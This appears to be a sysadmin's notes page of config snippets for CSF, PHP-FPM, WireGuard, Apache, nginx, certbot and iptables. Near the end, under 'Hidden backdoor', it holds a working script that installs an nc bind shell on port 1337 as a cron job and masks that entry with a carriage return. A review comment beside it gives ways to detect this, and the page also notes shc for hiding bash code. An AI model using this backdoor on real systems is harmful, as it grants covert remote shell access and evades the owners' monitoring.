vi /etc/security/limits.conf
* - nofile 524288
csf allow ssh specific IP
vi /etc/csf/csf.allow
192.168.100.100
vi /etc/csf/csf.conf
In the TCP_IN setting, remove your SSH port
or
vi /etc/csf/csf.conf
tcp|in|d=22|s=192.168.100.100
csf -ra
SSLCertificateFile: file ‘/etc/pki/tls/certs/localhost.crt’ does not exist or is empty
/usr/libexec/httpd-ssl-gencerts
PHP-FPM get status
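# Strip comment lines (leading ';') and blank lines from the PHP-FPM pool config.
# Write through a temp file: piping 'cat f | ... | tee f' lets tee truncate f
# before cat has read it, which can wipe the config. Match only lines that START
# with ';' so that a value merely containing ';' is not dropped.
conf=/etc/php/7.4/fpm/pool.d/www.conf
cp -- "$conf" "$conf.bak"   # keep a copy to diff against or restore
tmp=$(mktemp) || exit 1
grep -v '^[[:space:]]*;' -- "$conf" | awk 'NF' > "$tmp" && cat -- "$tmp" > "$conf"
rm -f -- "$tmp"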
vi /etc/php/7.4/fpm/pool.d/www.conf
pm.status_path=/status
ping.path=/ping
ping.response=pong
apt install fcgiwrap
ss -l | grep php
u_str LISTEN 0 511 /run/php/php7.4-fpm.sock 79744 * 0
# Ask the pool for its status page directly over the FastCGI socket (no web server involved).
# SCRIPT_NAME/SCRIPT_FILENAME must equal pm.status_path from the pool config.
# /status and /ping are unauthenticated: in the web server, expose them only to
# localhost or monitoring hosts.
env SCRIPT_NAME=/status SCRIPT_FILENAME=/status REQUEST_METHOD=GET \
  cgi-fcgi -bind -connect /run/php/php7.4-fpm.sock
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-type: text/plain;charset=UTF-8
pool: www
process manager: dynamic
start time: 07/Feb/2021:13:44:50 +0200
start since: 382
accepted conn: 3
listen queue: 0
max listen queue: 0
listen queue len: 0
idle processes: 1
active processes: 1
total processes: 2
max active processes: 1
max children reached: 0
slow requests: 0
wireguard setup
add-apt-repository ppa:wireguard/wireguard
apt-get update
apt install wireguard
MacOS
brew install wireguard-tools
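# Generate a keypair. umask 077 (scoped to the subshell) makes privatekey mode 0600
# instead of world-readable under the default umask; the private key is never
# written anywhere else.
(umask 077; wg genkey | tee privatekey | wg pubkey > publickey)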
Server side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.1/24
DNS = 1.1.1.1
PrivateKey = [ServerPrivateKey]
ListenPort = 51820
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp9s0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp9s0 -j MASQUERADE
[Peer]
#Peer #1
PublicKey = [Peer#1PublicKey]
AllowedIPs = 10.0.0.3/32
[Peer]
#Peer #2
PublicKey = [Peer#2PublicKey]
AllowedIPs = 10.0.0.10/32
[Peer]
#Peer #3
PublicKey = [Peer#3PublicKey]
AllowedIPs = 10.0.0.2/32
[Peer]
#Peer #4
PublicKey = [Peer#4PublicKey]
AllowedIPs = 10.0.0.11/32
Client side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.3/24
PrivateKey = [PrivateKeyPeer#1]
[Peer]
PublicKey = [ServerPublicKey]
Endpoint = some.domain.com:51820
AllowedIPs = 0.0.0.0/0
# This is for if you're behind a NAT and
# want the connection to be kept alive.
PersistentKeepalive = 25
Start/stop interface
wg-quick up wg0
wg-quick down wg0
Start/stop service
$ sudo systemctl stop wg-quick@wg0.service
$ sudo systemctl start wg-quick@wg0.service
Instead of having to modify the file for every client you want to add to the
server you could also use the wg tool instead:
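# add peer (run on the server); 'wg set ... peer' alone is incomplete — it needs
# the peer's public key and, as in wg0.conf, the peer's tunnel address as a /32
wg set wg0 peer [Peer#1PublicKey] allowed-ips 10.0.0.3/32
# verify connection (shows latest handshake and transfer counters per peer)
wg
# persist the runtime peers into /etc/wireguard/wg0.conf
wg-quick save wg0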
proxy_fcgi apache
# Apache hands PHP to PHP-FPM over mod_proxy_fcgi; no mod_php is loaded.
apt install apache2 php7.4-fpm
# enables the packaged /etc/apache2/conf-enabled/php7.4-fpm.conf shown below
a2enconf php7.4-fpm
# proxy_fcgi requires the base proxy module as well
a2enmod proxy proxy_fcgi
cat /etc/apache2/conf-enabled/php7.4-fpm.conf
# Redirect to local php-fpm if mod_php is not available
<IfModule !mod_php7.c>
    <IfModule proxy_fcgi_module>
        # Enable http authorization headers
        <IfModule setenvif_module>
        SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1
        </IfModule>

        <FilesMatch ".+\.ph(ar|p|tml)$">
            SetHandler "proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost"
        </FilesMatch>
        <FilesMatch ".+\.phps$">
            # Deny access to raw php sources by default
            # To re-enable it's recommended to enable access to the files
            # only in specific virtual host or directory
            Require all denied
        </FilesMatch>
        # Deny access to files without filename (e.g. '.php')
        <FilesMatch "^\.ph(ar|p|ps|tml)$">
            Require all denied
        </FilesMatch>
    </IfModule>
</IfModule>
proxy_fcgi:error AH01071: Got error Primary script unknown
File not found.
This error message means PHP-FPM could not find the requested script file.
obfuscate bash
hide bash code by compiling it into a C binary with shc (obfuscation, not encryption):
apt install shc
shc -f mybash.sh
hide cron
# The "\r" only hides the part of the entry before it from a terminal listing;
# 'crontab -l | cat -A' prints the whole line with the carriage return shown as ^M.
printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit
Hidden backdoor:
# NOTE(review): persistence via a cron entry whose text is masked with a carriage
# return; the scheduled task is a bind shell. Detection: 'crontab -l | cat -A'
# shows the full entry (^M where the normal listing is cut off), 'ss -ltnp'
# shows the listener on ${BDOOR_PT}, and the .i/.o FIFOs exist in /tmp while
# the task runs.
BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"
# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"
# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do
FIRST_TASK="${FIRST_TASK} "; ((i++))
done
fi
# carriage return goes there ("\r")
printf "${HIDDEN};\r${FIRST_TASK}\n"; cat
} | crontab -
if [ $? -eq 0 ]; then
echo "Backdoor is now hidden in cron table"
echo "Shell will be bind on port ${BDOOR_PT}."
else
echo "Failed."
fi
nginx log response time
vi /etc/nginx/nginx.conf
log_format timed_combined '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'$request_time $upstream_response_time $pipe';
access_log /var/log/nginx/srv24x7.com.access.log timed_combined;
certbot cloudflare DNS authentication API
add-apt-repository ppa:certbot/certbot
apt install software-properties-common
apt update
apt install python-certbot-nginx
apt install python-pip
pip install certbot-dns-cloudflare
vi /root/.secrets/cloudflare.ini
dns_cloudflare_api_key = "xxx"
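# Long options take two ASCII hyphens; the en-dashes that copy/paste produces make
# certbot reject the arguments. The credentials file is a secret: keep it 0600
# (certbot warns about unsafe permissions). With a global API key the file also
# needs dns_cloudflare_email; a scoped API token (dns_cloudflare_api_token) is the
# narrower, preferred credential. The wildcard is quoted so the shell cannot glob it.
chmod 600 /root/.secrets/cloudflare.ini
certbot certonly --dns-cloudflare \
  --dns-cloudflare-credentials /root/.secrets/cloudflare.ini \
  -d 'domain.com,*.domain.com' \
  --preferred-challenges dns-01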
prestashop more language nginx rewrite
"An error occurred while processing your request", nginx multilingual shop
location ~ (/lt|/en)/index\.php$ {
try_files $uri $uri/ /index.php?$args;
}
great suspender malware
great suspender alternative is Tab Suspender
centos iptables save after reboot
yum install iptables-services
service iptables save
iptables: Saving firewall rules to /etc/sysconfig/iptables:[ OK ]
An unexpected error occurred: pkg_resources.VersionConflict: (acme 0.31.0 (/usr/lib/python3/dist-packages), Requirement.parse('acme>=1.8.0'))
pip3 install --upgrade acme